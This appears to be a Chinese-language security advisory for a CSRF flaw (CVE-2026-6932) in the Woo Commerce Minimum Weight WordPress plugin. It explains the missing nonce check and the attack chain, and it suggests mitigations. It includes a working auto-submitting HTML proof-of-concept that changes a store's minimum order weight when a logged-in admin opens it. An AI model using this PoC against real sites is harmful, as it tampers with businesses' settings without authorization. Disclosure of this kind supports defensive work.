CVE-2026-6932: WooCommerce插件CSRF漏洞

漏洞信息

漏洞编号

CVE-2026-6932

漏洞类型

跨站请求伪造 (CSRF)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Woo Commerce Minimum Weight (WordPress插件)

漏洞概述

WordPress的Woo Commerce Minimum Weight插件在所有版本（包括3.0.1及以下）中存在跨站请求伪造（CSRF）漏洞。该漏洞源于`edit-weight.php`文件中的设置更新处理程序缺少nonce验证机制。未经过身份验证的攻击者可以通过诱导站点管理员点击恶意链接或访问攻击者控制的页面，利用伪造的POST请求来修改最小订单重量设置。这可能导致电子商务网站的订单逻辑被篡改，进而影响正常的业务运营和用户体验。

技术细节

该漏洞的核心在于WordPress插件开发中未遵循安全编码规范，特别是在处理状态改变请求时缺少防CSRF令牌（Nonce）验证。在受影响版本的`edit-weight.php`文件中，负责更新设置的代码直接接收并处理POST请求参数，而未验证请求来源的合法性。攻击者可以构造一个恶意的HTML页面，其中包含指向目标WordPress站点后台的表单提交请求。当管理员在已登录状态下访问此恶意页面时，浏览器会自动携带管理员的有效Cookie发送请求。由于服务器端缺少Nonce校验，该请求被误认为是合法的管理员操作，从而执行了设置更新。这种利用方式不需要攻击者获取管理员的密码，仅需社会工程学诱导即可实现，具有隐蔽性高、利用门槛低的特点。

攻击链分析

STEP 1

侦察

攻击者确认目标网站使用了存在漏洞的Woo Commerce Minimum Weight插件（版本 <= 3.0.1）。

STEP 2

武器化

攻击者构建一个包含恶意HTML表单的页面，该表单旨在向插件的后台设置页面发送修改最小订单重量的POST请求。

STEP 3

投递

攻击者通过钓鱼邮件或其他社会工程学手段，诱导站点管理员点击恶意链接或访问受控页面。

STEP 4

利用

管理员在浏览器已登录状态下加载恶意页面，浏览器自动携带会话Cookie向服务器发送伪造的请求。

STEP 5

影响

服务器由于缺少Nonce验证，接受了该请求并修改了插件设置，导致业务逻辑受影响。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
  PoC for CVE-2026-6932
  Description: CSRF exploit to change minimum weight settings.
  Usage: Host this file and trick the admin into opening it while logged in.
-->
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://target-site/wp-admin/admin.php?page=woo-commerce-min-weight" method="POST">
      <input type="hidden" name="min_weight" value="9999" />
      <input type="hidden" name="action" value="update" />
      <input type="hidden" name="submit" value="Save Changes" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

影响范围

Woo Commerce Minimum Weight <= 3.0.1

防御指南

临时缓解措施

建议管理员暂时卸载该插件，或在服务器端配置严格的Referer来源检查，直到官方发布修复补丁。同时，应加强对管理人员的网络安全意识培训，避免在登录状态下访问不明来源的链接。